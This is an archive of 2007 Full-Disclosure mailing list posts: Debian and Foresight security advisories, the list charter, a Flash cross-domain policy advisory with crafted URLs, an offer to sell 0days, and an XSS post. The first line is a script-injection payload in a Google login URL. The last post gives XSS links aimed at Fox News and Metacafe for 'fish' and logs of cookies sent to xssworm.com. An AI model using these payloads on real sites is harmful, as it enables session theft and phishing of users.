https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
mike
http://lets.coozi.com.au/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
pagvac
gnucitizen.org, ikwt.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1405-1] New zope-cmfplone packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1405-1[EMAIL PROTECTED] http://www.debian.org/security/Thijs Kinkhorst November 9th, 2007 http://www.debian.org/security/faq - -- Package: zope-cmfplone Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-5741 Debian Bug : 449523 It was discovered that Plone, a web content management system, allows remote attackers to execute arbitrary code via specially crafted web browser cookies. The oldstable distribution (sarge) is not affected by this problem. For the stable distribution (etch) this problem has been fixed in version 2.5.1-4etch1. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your zope-cmfplone package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1.dsc Size/MD5 checksum: 1114 dccc6173d55e9fedbe5a7b91d84a5721 http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1.diff.gz Size/MD5 checksum:10922 3a83d9323ac5285ac3d5cbde1d54e5f7 http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1.orig.tar.gz Size/MD5 checksum: 1064993 b48215d46aafa9e1f12196263d86a191 Architecture independent components: http://security.debian.org/pool/updates/main/z/zope-cmfplone/plone-site_2.5.1-4etch1_all.deb Size/MD5 checksum: 9828 318b81cff9a5bf4bf352743c46095693 http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1_all.deb Size/MD5 checksum: 1190788 49e266b7a7910079c92e039a910c4903 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHNOEdXm3vHE4uyloRAlD0AKDUgsEo+4+DL/LpLB46Cte3CjD4ZACeN08A WWoKssOksgDzYD5hEmzLvlY= =x7J9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1406-1] New horde3 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1406-1[EMAIL PROTECTED] http://www.debian.org/security/Thijs Kinkhorst November 9th, 2007 http://www.debian.org/security/faq - -- Package: horde3 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-3548 CVE-2006-3549 CVE-2006-4256 CVE-2007-1473 CVE-2007-1474 Debian Bug : 378281 383416 434045 Several remote vulnerabilities have been discovered in the Horde web application framework. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-3548 Moritz Naumann discovered that Horde allows remote attackers to inject arbitrary web script or HTML in the context of a logged in user (cross site scripting). This vulnerability applies to oldstable (sarge) only. CVE-2006-3549 Moritz Naumann discovered that Horde does not properly restrict its image proxy, allowing remote attackers to use the server as a proxy. This vulnerability applies to oldstable (sarge) only. CVE-2006-4256 Marc Ruef discovered that Horde allows remote attackers to include web pages from other sites, which could be useful for phishing attacks. This vulnerability applies to oldstable (sarge) only. CVE-2007-1473 Moritz Naumann discovered that Horde allows remote attackers to inject arbitrary web script or HTML in the context of a logged in user (cross site scripting). This vulnerability applies to both stable (etch) and oldstable (sarge). CVE-2007-1474 iDefense discovered that the cleanup cron script in Horde allows local users to delete arbitrary files. This vulnerability applies to oldstable (sarge) only. For the old stable distribution (sarge) these problems have been fixed in version 3.0.4-4sarge6. For the stable distribution (etch) these problems have been fixed in version 3.1.3-4etch1. For the unstable distribution (sid) these problems have been fixed in version 3.1.4-1. We recommend that you upgrade your horde3 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6.dsc Size/MD5 checksum: 920 a829a3791ed40777b0a4995be6727f13 http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6.diff.gz Size/MD5 checksum:13978 ab0dc18c4744b21919c154ac81600ad7 http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz Size/MD5 checksum: 3378143 e2221d409ba1c8841ce4ecee981d7b61 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6_all.deb Size/MD5 checksum: 3437942 f2cd9a0c7cb7e800d357d206d9f19841 Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1.dsc Size/MD5 checksum: 974 9fe3ec9d81a0d0c8ec6dd2ae3e14ed40 http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1.diff.gz Size/MD5 checksum:10633 84cad3aed2026c8a6358891897a15ee7 http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3.orig.tar.gz Size/MD5 checksum: 5232958 fbc56c608ac81474b846b1b4b7bb5ee7 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1_all.deb Size/MD5 checksum: 5270226 34a3af59a3469722ecf832948d390cea These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHNOM0Xm3vHE4uyloRAhqCAKDW38OVpHkAYAfr9LNzvh5k/j+8fQCg29kw KknLxPttFWUKWRsaCB5PesA= =SoAf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter:
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright [EMAIL PROTECTED] - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to [EMAIL PROTECTED], send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing [EMAIL PROTECTED] Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Canonicalization issues in Flash Cross-domain policy file request
=
Canonicalization issues in Flash Cross-domain policy file request
=
Vendor: Adobe (http://www.adobe.com)
Software Affected: Macromedia Flash Player
Software Version:Flash 9.0 r31
Impact (CVSSv2 score): medium (6.4/10, vector:
AV:N/AC:L/Au:N/C:N/I:P/A:P)
Discovered by: Antonio s4tan Parata
Discovery Date:2007-05-18
Release Date:2007-11-09
Last Update:2007-11-09
1. Summary
==
From the adobe web site: A policy file is a simple XML file that gives
the Flash Player permission to access data from a given domain without
displaying a security dialog. When placed on a server, it tells the
Flash Player to allow direct access to data on that server, without
prompting the user grant access.
It is possible to alterate the url of the request which gets the
cross-domain policy file.
2. Vulnerability Analysis
=
2.1 Overview
The policy file is usually placed in the document root of the web server
with the name crossdomain.xml, unless a different path is specified.
When a request to an external url is made, first of all flash requests
the content of the policy file at the external domain, and then (if the
policy permits it) the user request is made.
By adding some special chars in the url it is possible to modify the
path of the url request of the policy file.
Consider the following simple .mxmlc file:
?xml version=1.0 encoding=utf-8?
mx:Application xmlns:mx=http://www.adobe.com/2006/mxml; layout=absolute
mx:HTTPService id=request useProxy=false/mx:HTTPService
mx:TextInput id=src x=251 y=174/
mx:Button label=Send! x=430 y=174 id=sendButton
click=clickSendButton(event)/
mx:Script
![CDATA[
import flash.events.MouseEvent;
private function clickSendButton(event:MouseEvent):void {
request.url = src.text;
request.send();
}
]]
/mx:Script
/mx:Application
You can compile it with mxmlc.
If you enter in the text area the url
http://www.somesite.com/some/path/index.php,
before the request is done Flash makes a request to /crossdomain.xml to
retrieve the cross-domain policy file. If the policy permits the
request, another request to /some/path/index.php is made.
2.2 Attack example
--
On Firefox (v 2.0.0.3) if you insert the following url
http://www.somesite.com?http=,
the request to the policy file will be:
GET /?http=/crossdomain.xml HTTP/1.1
so instead of the policy file you retrieve the html of the homepage.
If you insert the url http://www.somesite.com?aaa=bbbccc=ddd#, the
request to the policy file will be:
GET /?aa=bbbcc=ddd HTTP/1.1
On Internet Explorer 7, we have a lot more fun. Internet Explorer
automaticaly converts \ to /.
So if we insert the following url
http://www.somesite.it\path/to/wathever/index.php?param=valuecross=,
the request to the policy file will be:
GET /path/crossdomain.xml HTTP/1.1
Then if we insert as url the following
http://www.somesite.it\path\to\wathever\index.php?aaa=bbbccc=, the
request to the policy file will be:
GET /path/to/wathever/index.php?aaa=bbbccc=/crossdomain.xml HTTP/1.1
We can arbitrarily modify the path of the request for the cross-domain
policy file.
Not only the HTTPService object is vulnerable, but also the WebService
object (as an example try the url http://www.somesite.it?wsdl=WSDL).
It is not excluded that other functions that make remote requests are
vulnerable.
2.3 What a malicious attacker can do
Modifying the path of the request an attacker can perform GET requests
to an arbitrary file on the web server (he can for example exploit a
CSRF vulnerability on a third web site).
3. Acknowledgments
==
I would like to acknowledge Alberto icesurfer Revelli and Stefano wisec
Di Paola for helping me in writing the advisory.
4. Contact
==
Antonio s4tan Parata - 2007
web site: http://www.ictsc.it
mail: [EMAIL PROTECTED], [EMAIL PROTECTED]
5. Disclaimer
=
Copyright (c) 2007 Antonio Parata
The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
6. Revision History
===
2007-11-09: Initial release
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] still some 0days to sell
Yes, Michael is the expert. Everyone knows private bugs are not 0day, only public bugs! LOLOLOLOL! Hire this guy! J On Fri, 09 Nov 2007 12:32:35 -0500 Michael Bann [EMAIL PROTECTED] wrote: Ok, first off, this is FULL DISCLOSURE. Perhaps you meant to send this to I'm a haxor. Don't worry, common mistake. Second, I highly doubt you have some 0days, if any at all. Perhaps a few bugs/buffer under/over flows, but nothing that, in the computer security field, would justify the title 0day. Cheers, Mike Juergen Marester wrote: Hi, I still have some 0days (just a few now) to sell about windows and linux. information by e-mail. see you, Juergen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Click for your daily horoscope, learn about money, love family. http://tagline.hushmail.com/fc/Ioyw6h4c4ZA3zegZxPh1WHd5UE5uH4AWMvEAVEbALzMd94GSjFvleI/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS explorer.exe high_load caused by malformed png
see http://hi.baidu.com/codeauditlabs/blog/item/00c6d00134386b00738da595.html -- Code Audit Labs http://www.vulnhunt.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FLEA-2007-0063-1 perl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0063-1 Published: 2007-11-09 Rating: Minor Updated Versions: perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-2 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116 Description: Previous versions of the perl package contain weaknesses when evaluating regular expressions. If a system is serving a perl-based web application that evaluates remote input as a regular expression, an attacker may be be able to exploit these weaknesses to execute arbitrary, attacker-provided code on the system, potentially elevating this to a remote, deterministic unauthorized access vulnerability. Foresight Linux does not, by default, enable or contain any such services. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzVJ3tfwEn07iAtZAQLGlQ//ZaOxxdDrbgVBDfnrRZ2E8AAY4wlT2x2w iI1ATK2PyHKRaMk+8hOskweQjxlQc3C4An6ff/wBCPpIzdG3rufsZCQ5YLwUVX0G InY9wFWKcE7LqUjp8l+lnBQyXf7po/LLppgwOR6ccMIxI44JbL/jcxfOT9EbO1bU fvEpzfokfH08j07wwX3ReNWA6xyO2SuWTiXSchUNGnYqNZeOJ115SdPKQC8I8jvi qhw/HLH96FCK19sigW+ELCcuWHdCKvUYVcSYTwXK/zGcMyr9IV4mgJiF0of7l7il ADYMYfT28JpkpdNXuOasfE8s7MNlEQ8wVqbbZt40je0OaoTTc/eslqf3JOlyvKZW 8b/WtYgZ1asgEHp3puTcl6e1EYpdf+Yg61RLVZiZ6W4UpFFgut97jp90yY3cR3C2 4v3C5978JQPGKMFhdB93YNE60fh3KdDWPutR34VwFEuhf50vRkND9++5uhmymtLG 0+vz/7QxoM3fTUuCUZLoPH+qJUYo+HwuasPmWUEyKpqrOT0eBnmZKh33/WHl3uo5 apyD9GgFl8bZjuVsTzirXh0JrLUNj4QWb22snEp9ZU/5uoJ0IaqWX++9jQGoJ+7V VIlfXilU0r8UeorVRuv3+HXDbHRbLnpuVhHTMq6Q1E4brux0Y8NOMxNdJq2UHuFU UVdaBJzKoMw= =Vbpl -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day Shockwave and Flash XSS Fish Exploits on Youtube, Revver, Metacafe, Google.
Foxnews 0day XSS Shock Attack http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video! Demo link to send to a fish: http://www.foxnews.com/video2/launchPage.html?http://localhost/ With netcat listen on localhost : listening on [any] 80 ... connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964 GET /E05510/a3/0/3/1380/1/0/116282DDC64/0/0//312340660.gif?D=DM%5FLOC%3D http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A% 2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20% 2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1 Host: pix01.revsci.net User-Agent: Mozilla/5.0 (Mandriver) Accept: image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost *Cookie: [EMAIL PROTECTED]; NETSEGS_J05532=960C7930BE970CE4J05532 3F149836472757D904723FE85C2C6A1738F3B885FCA46DE74CFF355ED* I think maybe this is to make many shock waves with XSS ! Zero Day Shockwave SWF Player Exploit with XSS Attackhttp://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/ in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish: MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - : http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028mediaURL=http://xssworm.com/?fishnormalizedTitle=space_tripisViral=falseisWatermarked=falsepostrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swfnetworkingAllowed=true We see this outputs in xssworm.com log - : GET /crossdomain.xml HTTP/1.1 Host: metacafe.122.2o7.net Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B294DB|472A0 D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C4D74-A170C543A87|472DA4DB[ CE]; s_vi_jdghjlgdijg=[CS]v4|472605E7606-A170BAE639DC|4726056DCE] s_vi _wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|. snips… We see many more serious vulnerability in the web 2.0 today. As you must be sure to visit http://xssworm.com/ security portal to discuss this shock problem many thanks for your reply. I am interested. *vaj -- Francesco Vaj [CISSP - GIAC] CSS Security Researcher mailto:[EMAIL PROTECTED] aim: XSS Cross Site -- XSS Cross Site Scripting Attacks and Web 2.0 AJAX Security Information News - http://xssworm.com/ -- Vaj, bella vaj. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
